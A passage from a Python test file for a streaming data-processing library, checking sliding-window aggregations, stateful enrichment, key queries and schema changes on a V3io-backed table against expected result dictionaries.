{'number_of_stuff_count_1h': 2, 'other_stuff_sum_1h': 1.0, 'col1': 1},
{'number_of_stuff_count_1h': 3, 'other_stuff_sum_1h': 3.0, 'col1': 2}],
2: [{'number_of_stuff_count_1h': 4, 'other_stuff_sum_1h': 6.0, 'col1': 3},
{'number_of_stuff_count_1h': 5, 'other_stuff_sum_1h': 10.0, 'col1': 4},
{'number_of_stuff_count_1h': 6, 'other_stuff_sum_1h': 15.0, 'col1': 5}],
3: [{'number_of_stuff_count_1h': 7, 'other_stuff_sum_1h': 21.0, 'col1': 6},
{'number_of_stuff_count_1h': 8, 'other_stuff_sum_1h': 28.0, 'col1': 7},
{'number_of_stuff_count_1h': 9, 'other_stuff_sum_1h': 36.0, 'col1': 8}]}
items_in_ingest_batch = 3
current_index = 0
for current_expected in expected.values():
table = Table(setup_teardown_test, V3ioDriver(), partitioned_by_key=partitioned_by_key, flush_interval_secs=flush_interval)
controller = build_flow([
SyncEmitSource(),
AggregateByKey([FieldAggregator('number_of_stuff', 'col1', ['count'],
SlidingWindows(['1h'], '10m')),
FieldAggregator('other_stuff', 'col1', ['sum'],
SlidingWindows(['1h'], '10m'))],
table),
NoSqlTarget(table),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
for i in range(items_in_ingest_batch):
data = {'col1': current_index}
controller.emit(data, 'tal', test_base_time + timedelta(minutes=1 * current_index))
current_index = current_index + 1
controller.terminate()
actual = controller.await_termination()
assert actual == current_expected, \
f'actual did not match expected. \n actual: {actual} \n expected: {current_expected}'
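
# Note how the expected counts keep growing (1 through 9) across the three
# loop iterations even though each iteration builds a fresh Table: the
# aggregation state is persisted through V3ioDriver and reloaded, so
# ingestion effectively resumes where the previous batch stopped.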
@pytest.mark.parametrize('partitioned_by_key', [True, False])
def test_aggregate_by_key_two_underlying_windows(setup_teardown_test, partitioned_by_key):
expected = {1: [{'number_of_stuff_count_24h': 1, 'other_stuff_sum_24h': 0.0, 'col1': 0},
{'number_of_stuff_count_24h': 2, 'other_stuff_sum_24h': 1.0, 'col1': 1},
{'number_of_stuff_count_24h': 3, 'other_stuff_sum_24h': 3.0, 'col1': 2}],
2: [{'number_of_stuff_count_24h': 4, 'other_stuff_sum_24h': 6.0, 'col1': 3},
{'number_of_stuff_count_24h': 5, 'other_stuff_sum_24h': 10.0, 'col1': 4},
{'number_of_stuff_count_24h': 6, 'other_stuff_sum_24h': 15.0, 'col1': 5}],
3: [{'number_of_stuff_count_24h': 7, 'other_stuff_sum_24h': 21.0, 'col1': 6},
{'number_of_stuff_count_24h': 8, 'other_stuff_sum_24h': 28.0, 'col1': 7},
{'number_of_stuff_count_24h': 9, 'other_stuff_sum_24h': 36.0, 'col1': 8}]}
items_in_ingest_batch = 3
current_index = 0
for current_expected in expected.values():
table = Table(setup_teardown_test, V3ioDriver(), partitioned_by_key=partitioned_by_key)
controller = build_flow([
SyncEmitSource(),
AggregateByKey([FieldAggregator('number_of_stuff', 'col1', ['count'],
SlidingWindows(['24h'], '10m')),
FieldAggregator('other_stuff', 'col1', ['sum'],
SlidingWindows(['24h'], '10m'))],
table),
NoSqlTarget(table),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
for i in range(items_in_ingest_batch):
data = {'col1': current_index}
controller.emit(data, 'tal', test_base_time + timedelta(minutes=25 * current_index))
current_index = current_index + 1
controller.terminate()
actual = controller.await_termination()
assert actual == current_expected, \
f'actual did not match expected. \n actual: {actual} \n expected: {current_expected}'
def test_aggregate_by_key_with_extra_aliases(setup_teardown_test):
table = Table(setup_teardown_test, V3ioDriver())
table['tal'] = {'color': 'blue', 'age': 41, 'iss': True, 'sometime': test_base_time}
def enrich(event, state):
if 'first_activity' not in state:
state['first_activity'] = event.time
event.body['time_since_activity'] = (event.time - state['first_activity']).seconds
state['last_event'] = event.time
event.body['total_activities'] = state['total_activities'] = state.get('total_activities', 0) + 1
event.body['color'] = state['color']
return event, state
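
    # enrich() is a stateful map: per key it records the first event time
    # and a running activity counter in the table row, then copies 'color'
    # from the pre-seeded state onto the event. With events 25 minutes
    # apart, time_since_activity grows in steps of 25 * 60 = 1500 seconds,
    # which is exactly the progression asserted below.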
controller = build_flow([
SyncEmitSource(),
MapWithState(table, enrich, group_by_key=True, full_event=True),
AggregateByKey([FieldAggregator('number_of_stuff', 'col1', ['sum', 'avg'],
SlidingWindows(['2h'], '10m'))],
table),
NoSqlTarget(table),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
items_in_ingest_batch = 10
for i in range(items_in_ingest_batch):
data = {'col1': i}
controller.emit(data, 'tal', test_base_time + timedelta(minutes=25 * i))
controller.terminate()
actual = controller.await_termination()
expected_results = [
{'number_of_stuff_sum_2h': 0, 'number_of_stuff_avg_2h': 0.0, 'col1': 0, 'time_since_activity': 0, 'total_activities': 1,
'color': 'blue'},
{'number_of_stuff_sum_2h': 1, 'number_of_stuff_avg_2h': 0.5, 'col1': 1, 'time_since_activity': 1500, 'total_activities': 2,
'color': 'blue'},
{'number_of_stuff_sum_2h': 3, 'number_of_stuff_avg_2h': 1.0, 'col1': 2, 'time_since_activity': 3000, 'total_activities': 3,
'color': 'blue'},
{'number_of_stuff_sum_2h': 6, 'number_of_stuff_avg_2h': 1.5, 'col1': 3, 'time_since_activity': 4500, 'total_activities': 4,
'color': 'blue'},
{'number_of_stuff_sum_2h': 10, 'number_of_stuff_avg_2h': 2.0, 'col1': 4, 'time_since_activity': 6000, 'total_activities': 5,
'color': 'blue'},
{'number_of_stuff_sum_2h': 15, 'number_of_stuff_avg_2h': 3.0, 'col1': 5, 'time_since_activity': 7500, 'total_activities': 6,
'color': 'blue'},
{'number_of_stuff_sum_2h': 20, 'number_of_stuff_avg_2h': 4.0, 'col1': 6, 'time_since_activity': 9000, 'total_activities': 7,
'color': 'blue'},
{'number_of_stuff_sum_2h': 25, 'number_of_stuff_avg_2h': 5.0, 'col1': 7, 'time_since_activity': 10500, 'total_activities': 8,
'color': 'blue'},
{'number_of_stuff_sum_2h': 30, 'number_of_stuff_avg_2h': 6.0, 'col1': 8, 'time_since_activity': 12000, 'total_activities': 9,
'color': 'blue'},
{'number_of_stuff_sum_2h': 35, 'number_of_stuff_avg_2h': 7.0, 'col1': 9, 'time_since_activity': 13500, 'total_activities': 10,
'color': 'blue'}]
assert actual == expected_results, \
f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
other_table = Table(setup_teardown_test, V3ioDriver())
controller = build_flow([
SyncEmitSource(),
QueryByKey(['number_of_stuff_sum_2h', 'number_of_stuff_avg_2h', 'color', 'age', 'iss', 'sometime'],
other_table, aliases={'color': 'external.color', 'iss': 'external.iss'}),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
base_time = test_base_time + timedelta(minutes=25 * items_in_ingest_batch)
data = {'col1': items_in_ingest_batch}
controller.emit(data, 'tal', base_time)
controller.terminate()
actual = controller.await_termination()
expected_results = [
{'number_of_stuff_sum_2h': 30, 'number_of_stuff_avg_2h': 7.5, 'col1': 10, 'external.color': 'blue', 'age': 41, 'external.iss': True,
'sometime': test_base_time}]
assert actual == expected_results, \
f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
@pytest.mark.parametrize('flush_interval', [None, 1])
def test_write_cache_with_aggregations(setup_teardown_test, flush_interval):
table = Table(setup_teardown_test, V3ioDriver(), flush_interval_secs=flush_interval)
table['tal'] = {'color': 'blue', 'age': 41, 'iss': True, 'sometime': test_base_time}
def enrich(event, state):
if 'first_activity' not in state:
state['first_activity'] = event.time
event.body['time_since_activity'] = (event.time - state['first_activity']).seconds
state['last_event'] = event.time
event.body['total_activities'] = state['total_activities'] = state.get('total_activities', 0) + 1
event.body['color'] = state['color']
return event, state
controller = build_flow([
SyncEmitSource(),
MapWithState(table, enrich, group_by_key=True, full_event=True),
AggregateByKey([FieldAggregator('number_of_stuff', 'col1', ['sum', 'avg'],
SlidingWindows(['2h'], '10m'))],
table),
NoSqlTarget(table),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
items_in_ingest_batch = 10
for i in range(items_in_ingest_batch):
data = {'col1': i}
controller.emit(data, 'tal', test_base_time + timedelta(minutes=25 * i))
controller.terminate()
actual = controller.await_termination()
expected_results = [
{'number_of_stuff_sum_2h': 0, 'number_of_stuff_avg_2h': 0.0, 'col1': 0, 'time_since_activity': 0, 'total_activities': 1,
'color': 'blue'},
{'number_of_stuff_sum_2h': 1, 'number_of_stuff_avg_2h': 0.5, 'col1': 1, 'time_since_activity': 1500, 'total_activities': 2,
'color': 'blue'},
{'number_of_stuff_sum_2h': 3, 'number_of_stuff_avg_2h': 1.0, 'col1': 2, 'time_since_activity': 3000, 'total_activities': 3,
'color': 'blue'},
{'number_of_stuff_sum_2h': 6, 'number_of_stuff_avg_2h': 1.5, 'col1': 3, 'time_since_activity': 4500, 'total_activities': 4,
'color': 'blue'},
{'number_of_stuff_sum_2h': 10, 'number_of_stuff_avg_2h': 2.0, 'col1': 4, 'time_since_activity': 6000, 'total_activities': 5,
'color': 'blue'},
{'number_of_stuff_sum_2h': 15, 'number_of_stuff_avg_2h': 3.0, 'col1': 5, 'time_since_activity': 7500, 'total_activities': 6,
'color': 'blue'},
{'number_of_stuff_sum_2h': 20, 'number_of_stuff_avg_2h': 4.0, 'col1': 6, 'time_since_activity': 9000, 'total_activities': 7,
'color': 'blue'},
{'number_of_stuff_sum_2h': 25, 'number_of_stuff_avg_2h': 5.0, 'col1': 7, 'time_since_activity': 10500, 'total_activities': 8,
'color': 'blue'},
{'number_of_stuff_sum_2h': 30, 'number_of_stuff_avg_2h': 6.0, 'col1': 8, 'time_since_activity': 12000, 'total_activities': 9,
'color': 'blue'},
{'number_of_stuff_sum_2h': 35, 'number_of_stuff_avg_2h': 7.0, 'col1': 9, 'time_since_activity': 13500, 'total_activities': 10,
'color': 'blue'}]
assert actual == expected_results, \
f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
other_table = Table(setup_teardown_test, V3ioDriver(), flush_interval_secs=flush_interval)
controller = build_flow([
SyncEmitSource(),
QueryByKey(['number_of_stuff_sum_2h', 'number_of_stuff_avg_2h', 'color', 'age', 'iss', 'sometime'],
other_table),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
base_time = test_base_time + timedelta(minutes=25 * items_in_ingest_batch)
data = {'col1': items_in_ingest_batch}
controller.emit(data, 'tal', base_time)
controller.terminate()
actual = controller.await_termination()
expected_results = [
{'number_of_stuff_sum_2h': 30, 'number_of_stuff_avg_2h': 7.5, 'col1': 10, 'color': 'blue', 'age': 41, 'iss': True,
'sometime': test_base_time}]
assert actual == expected_results, \
f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
@pytest.mark.parametrize('flush_interval', [None, 1])
def test_write_cache(setup_teardown_test, flush_interval):
table = Table(setup_teardown_test, V3ioDriver(), flush_interval_secs=flush_interval)
table['tal'] = {'color': 'blue', 'age': 41, 'iss': True, 'sometime': test_base_time}
def enrich(event, state):
if 'first_activity' not in state:
state['first_activity'] = event.time
event.body['time_since_activity'] = (event.time - state['first_activity']).seconds
state['last_event'] = event.time
event.body['total_activities'] = state['total_activities'] = state.get('total_activities', 0) + 1
event.body['color'] = state['color']
return event, state
controller = build_flow([
SyncEmitSource(),
MapWithState(table, enrich, group_by_key=True, full_event=True),
NoSqlTarget(table),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
items_in_ingest_batch = 10
for i in range(items_in_ingest_batch):
data = {'col1': i}
controller.emit(data, 'tal', test_base_time + timedelta(minutes=25 * i))
controller.terminate()
actual = controller.await_termination()
expected_results = [
{'col1': 0, 'time_since_activity': 0, 'total_activities': 1, 'color': 'blue'},
{'col1': 1, 'time_since_activity': 1500, 'total_activities': 2, 'color': 'blue'},
{'col1': 2, 'time_since_activity': 3000, 'total_activities': 3, 'color': 'blue'},
{'col1': 3, 'time_since_activity': 4500, 'total_activities': 4, 'color': 'blue'},
{'col1': 4, 'time_since_activity': 6000, 'total_activities': 5, 'color': 'blue'},
{'col1': 5, 'time_since_activity': 7500, 'total_activities': 6, 'color': 'blue'},
{'col1': 6, 'time_since_activity': 9000, 'total_activities': 7, 'color': 'blue'},
{'col1': 7, 'time_since_activity': 10500, 'total_activities': 8, 'color': 'blue'},
{'col1': 8, 'time_since_activity': 12000, 'total_activities': 9, 'color': 'blue'},
{'col1': 9, 'time_since_activity': 13500, 'total_activities': 10, 'color': 'blue'}]
assert actual == expected_results, \
f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
other_table = Table(setup_teardown_test, V3ioDriver())
controller = build_flow([
SyncEmitSource(),
MapWithState(other_table, enrich, group_by_key=True, full_event=True),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
base_time = test_base_time + timedelta(minutes=25 * items_in_ingest_batch)
data = {'col1': items_in_ingest_batch}
controller.emit(data, 'tal', base_time)
controller.terminate()
actual = controller.await_termination()
expected_results = [
{'col1': 10, 'time_since_activity': 15000, 'total_activities': 11, 'color': 'blue'}]
assert actual == expected_results, \
f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
def test_aggregate_with_string_table(setup_teardown_test):
table = Table(setup_teardown_test, V3ioDriver())
table_name = 'tals-table'
context = Context(initial_tables={table_name: table})
controller = build_flow([
SyncEmitSource(),
AggregateByKey([FieldAggregator('number_of_stuff', 'col1', ['sum', 'avg', 'min', 'max', 'sqr'],
SlidingWindows(['1h', '2h', '24h'], '10m'))],
table_name, context=context),
NoSqlTarget(table),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
items_in_ingest_batch = 10
for i in range(items_in_ingest_batch):
data = {'col1': i}
controller.emit(data, 'tal', test_base_time + timedelta(minutes=25 * i))
controller.terminate()
actual = controller.await_termination()
expected_results = [
{'number_of_stuff_sum_1h': 0, 'number_of_stuff_sum_2h': 0, 'number_of_stuff_sum_24h': 0, 'number_of_stuff_min_1h': 0,
'number_of_stuff_min_2h': 0, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 0, 'number_of_stuff_max_2h': 0,
'number_of_stuff_max_24h': 0, 'number_of_stuff_sqr_1h': 0, 'number_of_stuff_sqr_2h': 0, 'number_of_stuff_sqr_24h': 0,
'number_of_stuff_avg_1h': 0.0, 'number_of_stuff_avg_2h': 0.0, 'number_of_stuff_avg_24h': 0.0, 'col1': 0},
{'number_of_stuff_sum_1h': 1, 'number_of_stuff_sum_2h': 1, 'number_of_stuff_sum_24h': 1, 'number_of_stuff_min_1h': 0,
'number_of_stuff_min_2h': 0, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 1, 'number_of_stuff_max_2h': 1,
'number_of_stuff_max_24h': 1, 'number_of_stuff_sqr_1h': 1, 'number_of_stuff_sqr_2h': 1, 'number_of_stuff_sqr_24h': 1,
'number_of_stuff_avg_1h': 0.5, 'number_of_stuff_avg_2h': 0.5, 'number_of_stuff_avg_24h': 0.5, 'col1': 1},
{'number_of_stuff_sum_1h': 3, 'number_of_stuff_sum_2h': 3, 'number_of_stuff_sum_24h': 3, 'number_of_stuff_min_1h': 0,
'number_of_stuff_min_2h': 0, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 2, 'number_of_stuff_max_2h': 2,
'number_of_stuff_max_24h': 2, 'number_of_stuff_sqr_1h': 5, 'number_of_stuff_sqr_2h': 5, 'number_of_stuff_sqr_24h': 5,
'number_of_stuff_avg_1h': 1.0, 'number_of_stuff_avg_2h': 1.0, 'number_of_stuff_avg_24h': 1.0, 'col1': 2},
{'number_of_stuff_sum_1h': 6, 'number_of_stuff_sum_2h': 6, 'number_of_stuff_sum_24h': 6, 'number_of_stuff_min_1h': 1,
'number_of_stuff_min_2h': 0, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 3, 'number_of_stuff_max_2h': 3,
'number_of_stuff_max_24h': 3, 'number_of_stuff_sqr_1h': 14, 'number_of_stuff_sqr_2h': 14, 'number_of_stuff_sqr_24h': 14,
'number_of_stuff_avg_1h': 2.0, 'number_of_stuff_avg_2h': 1.5, 'number_of_stuff_avg_24h': 1.5, 'col1': 3},
{'number_of_stuff_sum_1h': 9, 'number_of_stuff_sum_2h': 10, 'number_of_stuff_sum_24h': 10, 'number_of_stuff_min_1h': 2,
'number_of_stuff_min_2h': 0, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 4, 'number_of_stuff_max_2h': 4,
'number_of_stuff_max_24h': 4, 'number_of_stuff_sqr_1h': 29, 'number_of_stuff_sqr_2h': 30, 'number_of_stuff_sqr_24h': 30,
'number_of_stuff_avg_1h': 3.0, 'number_of_stuff_avg_2h': 2.0, 'number_of_stuff_avg_24h': 2.0, 'col1': 4},
{'number_of_stuff_sum_1h': 12, 'number_of_stuff_sum_2h': 15, 'number_of_stuff_sum_24h': 15, 'number_of_stuff_min_1h': 3,
'number_of_stuff_min_2h': 1, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 5, 'number_of_stuff_max_2h': 5,
'number_of_stuff_max_24h': 5, 'number_of_stuff_sqr_1h': 50, 'number_of_stuff_sqr_2h': 55, 'number_of_stuff_sqr_24h': 55,
'number_of_stuff_avg_1h': 4.0, 'number_of_stuff_avg_2h': 3.0, 'number_of_stuff_avg_24h': 2.5, 'col1': 5},
{'number_of_stuff_sum_1h': 15, 'number_of_stuff_sum_2h': 20, 'number_of_stuff_sum_24h': 21, 'number_of_stuff_min_1h': 4,
'number_of_stuff_min_2h': 2, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 6, 'number_of_stuff_max_2h': 6,
'number_of_stuff_max_24h': 6, 'number_of_stuff_sqr_1h': 77, 'number_of_stuff_sqr_2h': 90, 'number_of_stuff_sqr_24h': 91,
'number_of_stuff_avg_1h': 5.0, 'number_of_stuff_avg_2h': 4.0, 'number_of_stuff_avg_24h': 3.0, 'col1': 6},
{'number_of_stuff_sum_1h': 18, 'number_of_stuff_sum_2h': 25, 'number_of_stuff_sum_24h': 28, 'number_of_stuff_min_1h': 5,
'number_of_stuff_min_2h': 3, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 7, 'number_of_stuff_max_2h': 7,
'number_of_stuff_max_24h': 7, 'number_of_stuff_sqr_1h': 110, 'number_of_stuff_sqr_2h': 135, 'number_of_stuff_sqr_24h': 140,
'number_of_stuff_avg_1h': 6.0, 'number_of_stuff_avg_2h': 5.0, 'number_of_stuff_avg_24h': 3.5, 'col1': 7},
{'number_of_stuff_sum_1h': 21, 'number_of_stuff_sum_2h': 30, 'number_of_stuff_sum_24h': 36, 'number_of_stuff_min_1h': 6,
'number_of_stuff_min_2h': 4, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 8, 'number_of_stuff_max_2h': 8,
'number_of_stuff_max_24h': 8, 'number_of_stuff_sqr_1h': 149, 'number_of_stuff_sqr_2h': 190, 'number_of_stuff_sqr_24h': 204,
'number_of_stuff_avg_1h': 7.0, 'number_of_stuff_avg_2h': 6.0, 'number_of_stuff_avg_24h': 4.0, 'col1': 8},
{'number_of_stuff_sum_1h': 24, 'number_of_stuff_sum_2h': 35, 'number_of_stuff_sum_24h': 45, 'number_of_stuff_min_1h': 7,
'number_of_stuff_min_2h': 5, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 9, 'number_of_stuff_max_2h': 9,
'number_of_stuff_max_24h': 9, 'number_of_stuff_sqr_1h': 194, 'number_of_stuff_sqr_2h': 255, 'number_of_stuff_sqr_24h': 285,
'number_of_stuff_avg_1h': 8.0, 'number_of_stuff_avg_2h': 7.0, 'number_of_stuff_avg_24h': 4.5, 'col1': 9}
]
assert actual == expected_results, \
f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
def _assert_schema_equal(actual, expected):
assert len(actual) == len(expected)
for key, item in actual.items():
current_expected = expected[key]
assert item['period_millis'] == current_expected['period_millis']
assert set(item['aggregates']) == set(current_expected['aggregates'])
async def load_schema(path):
driver = V3ioDriver()
container, table_path = _split_path(path)
res = await driver._load_schema(container, table_path)
await driver.close()
return res
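
# Helper sketch: the aggregation schema is stored alongside the table data,
# so it can be read back directly through the driver. _split_path is
# assumed here to split a 'container/table/path' string into its container
# and in-container path parts.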
def test_modify_schema(setup_teardown_test):
table = Table(setup_teardown_test, V3ioDriver())
controller = build_flow([
SyncEmitSource(),
AggregateByKey([FieldAggregator('number_of_stuff', 'col1', ['sum', 'avg', 'min', 'max'],
SlidingWindows(['1h', '2h', '24h'], '10m'))],
table),
NoSqlTarget(table),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
items_in_ingest_batch = 10
for i in range(items_in_ingest_batch):
data = {'col1': i}
controller.emit(data, 'tal', test_base_time + timedelta(minutes=25 * i))
controller.terminate()
actual = controller.await_termination()
expected_results = [
{'col1': 0, 'number_of_stuff_sum_1h': 0, 'number_of_stuff_sum_2h': 0, 'number_of_stuff_sum_24h': 0, 'number_of_stuff_min_1h': 0,
'number_of_stuff_min_2h': 0, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 0, 'number_of_stuff_max_2h': 0,
'number_of_stuff_max_24h': 0, 'number_of_stuff_avg_1h': 0.0, 'number_of_stuff_avg_2h': 0.0, 'number_of_stuff_avg_24h': 0.0},
{'col1': 1, 'number_of_stuff_sum_1h': 1, 'number_of_stuff_sum_2h': 1, 'number_of_stuff_sum_24h': 1, 'number_of_stuff_min_1h': 0,
'number_of_stuff_min_2h': 0, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 1, 'number_of_stuff_max_2h': 1,
'number_of_stuff_max_24h': 1, 'number_of_stuff_avg_1h': 0.5, 'number_of_stuff_avg_2h': 0.5, 'number_of_stuff_avg_24h': 0.5},
{'col1': 2, 'number_of_stuff_sum_1h': 3, 'number_of_stuff_sum_2h': 3, 'number_of_stuff_sum_24h': 3, 'number_of_stuff_min_1h': 0,
'number_of_stuff_min_2h': 0, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 2, 'number_of_stuff_max_2h': 2,
'number_of_stuff_max_24h': 2, 'number_of_stuff_avg_1h': 1.0, 'number_of_stuff_avg_2h': 1.0, 'number_of_stuff_avg_24h': 1.0},
{'col1': 3, 'number_of_stuff_sum_1h': 6, 'number_of_stuff_sum_2h': 6, 'number_of_stuff_sum_24h': 6, 'number_of_stuff_min_1h': 1,
'number_of_stuff_min_2h': 0, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 3, 'number_of_stuff_max_2h': 3,
'number_of_stuff_max_24h': 3, 'number_of_stuff_avg_1h': 2.0, 'number_of_stuff_avg_2h': 1.5, 'number_of_stuff_avg_24h': 1.5},
{'col1': 4, 'number_of_stuff_sum_1h': 9, 'number_of_stuff_sum_2h': 10, 'number_of_stuff_sum_24h': 10, 'number_of_stuff_min_1h': 2,
'number_of_stuff_min_2h': 0, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 4, 'number_of_stuff_max_2h': 4,
'number_of_stuff_max_24h': 4, 'number_of_stuff_avg_1h': 3.0, 'number_of_stuff_avg_2h': 2.0, 'number_of_stuff_avg_24h': 2.0},
{'col1': 5, 'number_of_stuff_sum_1h': 12, 'number_of_stuff_sum_2h': 15, 'number_of_stuff_sum_24h': 15,
'number_of_stuff_min_1h': 3, 'number_of_stuff_min_2h': 1, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 5,
'number_of_stuff_max_2h': 5, 'number_of_stuff_max_24h': 5, 'number_of_stuff_avg_1h': 4.0, 'number_of_stuff_avg_2h': 3.0,
'number_of_stuff_avg_24h': 2.5},
{'col1': 6, 'number_of_stuff_sum_1h': 15, 'number_of_stuff_sum_2h': 20, 'number_of_stuff_sum_24h': 21,
'number_of_stuff_min_1h': 4, 'number_of_stuff_min_2h': 2, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 6,
'number_of_stuff_max_2h': 6, 'number_of_stuff_max_24h': 6, 'number_of_stuff_avg_1h': 5.0, 'number_of_stuff_avg_2h': 4.0,
'number_of_stuff_avg_24h': 3.0},
{'col1': 7, 'number_of_stuff_sum_1h': 18, 'number_of_stuff_sum_2h': 25, 'number_of_stuff_sum_24h': 28,
'number_of_stuff_min_1h': 5, 'number_of_stuff_min_2h': 3, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 7,
'number_of_stuff_max_2h': 7, 'number_of_stuff_max_24h': 7, 'number_of_stuff_avg_1h': 6.0, 'number_of_stuff_avg_2h': 5.0,
'number_of_stuff_avg_24h': 3.5},
{'col1': 8, 'number_of_stuff_sum_1h': 21, 'number_of_stuff_sum_2h': 30, 'number_of_stuff_sum_24h': 36,
'number_of_stuff_min_1h': 6, 'number_of_stuff_min_2h': 4, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 8,
'number_of_stuff_max_2h': 8, 'number_of_stuff_max_24h': 8, 'number_of_stuff_avg_1h': 7.0, 'number_of_stuff_avg_2h': 6.0,
'number_of_stuff_avg_24h': 4.0},
{'col1': 9, 'number_of_stuff_sum_1h': 24, 'number_of_stuff_sum_2h': 35, 'number_of_stuff_sum_24h': 45,
'number_of_stuff_min_1h': 7, 'number_of_stuff_min_2h': 5, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 9,
'number_of_stuff_max_2h': 9, 'number_of_stuff_max_24h': 9, 'number_of_stuff_avg_1h': 8.0, 'number_of_stuff_avg_2h': 7.0,
'number_of_stuff_avg_24h': 4.5}
]
assert actual == expected_results, \
f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
schema = asyncio.run(load_schema(setup_teardown_test))
expected_schema = {'number_of_stuff': {'period_millis': 600000, 'aggregates': ['max', 'min', 'sum', 'count']}}
_assert_schema_equal(schema, expected_schema)
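# Reopen the same table with an extra aggregation ('new_aggr'); the persisted schema
# should gain it rather than be rejected.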
other_table = Table(setup_teardown_test, V3ioDriver())
controller = build_flow([
SyncEmitSource(),
AggregateByKey([FieldAggregator('number_of_stuff', 'col1', ['sum', 'avg', 'min', 'max'],
SlidingWindows(['1h', '2h', '24h'], '10m')),
FieldAggregator('new_aggr', 'col1', ['min', 'max'],
SlidingWindows(['3h'], '10m'))],
other_table),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
base_time = test_base_time + timedelta(minutes=25 * items_in_ingest_batch)
data = {'col1': items_in_ingest_batch}
controller.emit(data, 'tal', base_time)
controller.terminate()
actual = controller.await_termination()
expected_results = [
{'col1': 10, 'number_of_stuff_sum_1h': 27, 'number_of_stuff_sum_2h': 40, 'number_of_stuff_sum_24h': 55, 'number_of_stuff_min_1h': 8,
'number_of_stuff_min_2h': 6, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 10, 'number_of_stuff_max_2h': 10,
'number_of_stuff_max_24h': 10, 'new_aggr_min_3h': 10, 'new_aggr_max_3h': 10, 'number_of_stuff_avg_1h': 9.0,
'number_of_stuff_avg_2h': 8.0, 'number_of_stuff_avg_24h': 5.0, 'col1': 10}
]
assert actual == expected_results, \
f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
schema = asyncio.run(load_schema(setup_teardown_test))
expected_schema = {'number_of_stuff': {'period_millis': 600000, 'aggregates': ['sum', 'max', 'min', 'count']},
'new_aggr': {'period_millis': 600000, 'aggregates': ['min', 'max']}}
_assert_schema_equal(schema, expected_schema)
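# Reopening a table with a different aggregation period ('3m' instead of the stored
# '10m') is incompatible with the persisted schema and must raise ValueError.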
def test_invalid_modify_schema(setup_teardown_test):
table = Table(setup_teardown_test, V3ioDriver())
controller = build_flow([
SyncEmitSource(),
AggregateByKey([FieldAggregator('number_of_stuff', 'col1', ['sum', 'avg', 'min', 'max'],
SlidingWindows(['1h', '2h', '24h'], '10m'))],
table),
NoSqlTarget(table),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
items_in_ingest_batch = 10
for i in range(items_in_ingest_batch):
data = {'col1': i}
controller.emit(data, 'tal', test_base_time + timedelta(minutes=25 * i))
controller.terminate()
actual = controller.await_termination()
expected_results = [
{'col1': 0, 'number_of_stuff_sum_1h': 0, 'number_of_stuff_sum_2h': 0, 'number_of_stuff_sum_24h': 0, 'number_of_stuff_min_1h': 0,
'number_of_stuff_min_2h': 0, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 0, 'number_of_stuff_max_2h': 0,
'number_of_stuff_max_24h': 0, 'number_of_stuff_avg_1h': 0.0, 'number_of_stuff_avg_2h': 0.0, 'number_of_stuff_avg_24h': 0.0},
{'col1': 1, 'number_of_stuff_sum_1h': 1, 'number_of_stuff_sum_2h': 1, 'number_of_stuff_sum_24h': 1, 'number_of_stuff_min_1h': 0,
'number_of_stuff_min_2h': 0, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 1, 'number_of_stuff_max_2h': 1,
'number_of_stuff_max_24h': 1, 'number_of_stuff_avg_1h': 0.5, 'number_of_stuff_avg_2h': 0.5, 'number_of_stuff_avg_24h': 0.5},
{'col1': 2, 'number_of_stuff_sum_1h': 3, 'number_of_stuff_sum_2h': 3, 'number_of_stuff_sum_24h': 3, 'number_of_stuff_min_1h': 0,
'number_of_stuff_min_2h': 0, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 2, 'number_of_stuff_max_2h': 2,
'number_of_stuff_max_24h': 2, 'number_of_stuff_avg_1h': 1.0, 'number_of_stuff_avg_2h': 1.0, 'number_of_stuff_avg_24h': 1.0},
{'col1': 3, 'number_of_stuff_sum_1h': 6, 'number_of_stuff_sum_2h': 6, 'number_of_stuff_sum_24h': 6, 'number_of_stuff_min_1h': 1,
